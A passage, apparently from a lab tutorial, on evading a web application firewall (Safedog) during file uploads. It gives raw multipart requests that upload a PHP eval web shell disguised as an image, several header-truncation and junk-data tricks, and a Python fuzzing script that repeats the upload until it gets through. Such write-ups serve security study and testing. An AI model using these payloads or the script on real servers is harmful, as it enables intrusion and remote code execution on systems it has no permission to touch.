------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundarymeEzpUTMsmOfjwAA--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Repetition of filename
&lt;/h3&gt;

&lt;p&gt;The final uploaded file name is &lt;code&gt;shell.php&lt;/code&gt;. However, a WAF that extracts the file name with a regular expression will typically match only the first &lt;code&gt;filename&lt;/code&gt; occurrence and therefore never evaluates the last one.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.jpg filename="shell.jpg"; filename="shell.jpg"; filename="shell.php";
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Data Overflow
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Inserting Junk Data Between name and filename
&lt;/h3&gt;

&lt;p&gt;A large volume of junk data may be inserted between &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;filename&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-02/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf; 
filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A semicolon must be placed after the large volume of junk data.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Inserting Junk Data into the Boundary String
&lt;/h3&gt;

&lt;p&gt;The boundary string can contain arbitrary data (subject to length limitations). When its length exceeds what the WAF will inspect but remains within what the web server accepts, the file upload may bypass the WAF.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-01/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9
Content-Disposition: form-data; name="upload_file";filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Inserting Junk Data at the End of the Boundary
&lt;/h3&gt;

&lt;p&gt;As mentioned previously, arbitrary data may be appended to the end of the &lt;code&gt;boundary&lt;/code&gt; string; thus, a large volume of junk data can be added there.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-01/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf,bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;592&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Inserting Junk Data Between multipart/form-data and boundary
&lt;/h3&gt;

&lt;p&gt;Since it is possible to insert any data between &lt;code&gt;multipart/form-data&lt;/code&gt; and &lt;code&gt;boundary&lt;/code&gt;, a large volume of junk data can be placed there.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Pass-01/index.php&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;multipart/form-data bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;319&lt;/span&gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Data Truncation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Carriage Return and Line Feed Truncation
&lt;/h3&gt;

&lt;p&gt;The values of headers in a POST request (but not the header names) may be split across line breaks, provided no blank line is introduced. If the WAF stops matching the file name at a line break, a bypass can occur.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: for
m-data; name="upload_
file"; fi
le
name="sh
ell.p
h
p"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Semicolon Truncation
&lt;/h3&gt;

&lt;p&gt;If the WAF truncates the file name at a semicolon, a bypass can be achieved.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.jpg;.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Quotation Mark Truncation
&lt;/h3&gt;

&lt;p&gt;PHP versions prior to 5.3 exhibit single/double quote truncation behaviour.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.jpg'.php"
Content-Disposition: form-data; name="upload_file"; filename="shell.jpg".php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Null Byte Truncation
&lt;/h3&gt;

&lt;p&gt;In a URL, &lt;code&gt;%00&lt;/code&gt; is the percent-encoding of the ASCII null character (0x00), a reserved control character; string handling that encounters it stops reading at that point. In the example below, &lt;code&gt;[0x00]&lt;/code&gt; stands for a literal null byte.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="upload_file"; filename="shell.php[0x00].jpg"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Practical Demonstration – Bypassing Safedog File Upload Protection
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Experimental Environment&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Target: Upload-Labs (Pass-1)&lt;/li&gt;
&lt;li&gt;Database: MySQL 5.5&lt;/li&gt;
&lt;li&gt;Web script: PHP 5.4.19&lt;/li&gt;
&lt;li&gt;WAF: Safedog for Apache v4.0.3025&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;During testing, only the upload protection module of Safedog was enabled; otherwise, other modules could delete files from the target environment due to false positives.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwrwjckbl4253ov183s3l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwrwjckbl4253ov183s3l.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Practical Case 1 – Writing a Fuzzing Script to Exploit Data Overflow
&lt;/h3&gt;

&lt;p&gt;Given that the boundary string can accommodate a large volume of junk data, a fuzzing script was written to test whether the WAF could be bypassed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;#! /usr/bin/env python
# _*_  coding:utf-8 _*_
&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;

&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://hackrock.com:813/Pass-01/index.php&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate_random_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;randomlength&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;random_str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;
    &lt;span class="n"&gt;base_str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
    &lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base_str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;randomlength&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;random_str&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;base_str&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;randint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;random_str&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;8000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;generate_random_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

        &lt;span class="n"&gt;headers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Host&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;User-Agent&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Referer&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://hackrock.com:813/Pass-01/index.php&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Content-Type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;multipart/form-data; boundary=----&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
            ------&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
            Content-Disposition: form-data; name=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;upload_file&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;; filename=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shell.php&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;
            Content-Type: image/png

            &amp;lt;?php @eval($_POST[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;hack&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;]); ?&amp;gt;

            ------&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
            Content-Disposition: form-data; name=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;submit&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;

            上传
            ------&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;--

        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

        &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;headers&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="c1"&gt;#print payload
&lt;/span&gt;        &lt;span class="c1"&gt;#print headers
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;上传&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Length is : %s &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



